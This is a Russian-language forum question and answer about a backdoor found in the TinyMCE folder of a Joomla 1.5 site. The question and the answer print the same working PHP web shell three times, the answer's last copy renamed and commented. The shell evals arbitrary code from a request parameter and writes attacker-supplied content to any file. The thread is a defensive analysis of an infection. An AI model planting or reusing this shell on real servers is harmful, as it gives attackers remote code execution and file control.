# Спам Бот на сайте Joomla 1.5, откуда ноги растут?

Tags: joomla, php, вирусы

Завелся у меня на сайте спамбот, который залили через б-дор.
Копался в логах, обнаружил вроде бэкдор. 
Хотелось понять что он именно делает, т.к. не силен в `php` и как его смогли занести, скажу что находился в папке `tiny mce`.

```
<? php

$vycv = "d4e147814c9311b6503b572e484a4bb2"; 
if(isset($_REQUEST['mmjzvk'])) { 
    $oaxa = $_REQUEST['mmjzvk']; 
    eval($oaxa); 
    exit(); 
} 
if(isset($_REQUEST['emgakm'])) { 
    $bhiu = $_REQUEST['hzxzunoh']; 
    $ygvi = $_REQUEST['emgakm']; 
    $kihku = fopen($ygvi, 'w'); 
    $wbmgoq = fwrite($kihku, $bhiu); 
    fclose($kihku); 
    echo $wbmgoq; 
    exit(); 
}

?>
```

Answer (score 2):

Разберем по полочкам

```
<?php
  $vycv = "d4e147814c9311b6503b572e484a4bb2";
  if(isset($_REQUEST['mmjzvk'])) {
    $oaxa = $_REQUEST['mmjzvk'];
    eval($oaxa);
    exit();
  }
  if(isset($_REQUEST['emgakm'])) {
    $bhiu = $_REQUEST['hzxzunoh']; 
    $ygvi = $_REQUEST['emgakm'];
    $kihku = fopen($ygvi, 'w');
    $wbmgoq = fwrite($kihku, $bhiu);
    fclose($kihku);
    echo $wbmgoq;
    exit();
}
?>
```

То есть, скрипт проверяет, есть ли во входящих данных (в get, post или куках) параметр `mmjzvk` или `emgakm`. Если первый есть, то значение трактуется как php код и исполняется. Если присутствует второй ключ (`emgakm`) то его значение трактуется как имя файла, в который записывается текст, передаваемым ключиком `hzxzunoh`.

Этих двух действий достаточно для различных деструктивных действий.

**upd**

Сделал "рефакторинг":) Думаю, код должен стать понятнее.

```
<?php
  $vycv = "d4e147814c9311b6503b572e484a4bb2";
  // исполнить команду
  if(isset($_REQUEST['mmjzvk'])) {
    $command = $_REQUEST['mmjzvk'];
    // исполнить строку как php код.
    // http://php.net/manual/ru/function.eval.php
    eval($command);
    exit();
  }
  // запись в файл
  if(isset($_REQUEST['emgakm'])) {
    $text = $_REQUEST['hzxzunoh']; 
    $filename = $_REQUEST['emgakm'];
    // стандартный код записи текста в файл.
    $file_desc = fopen($filename, 'w');
    $result = fwrite($file_desc, $text);
    fclose($file_desc);
    // вывод результата записи - либо кол-во записанных байт или false, если не получилось
    echo $result;
    exit();
}
?>
```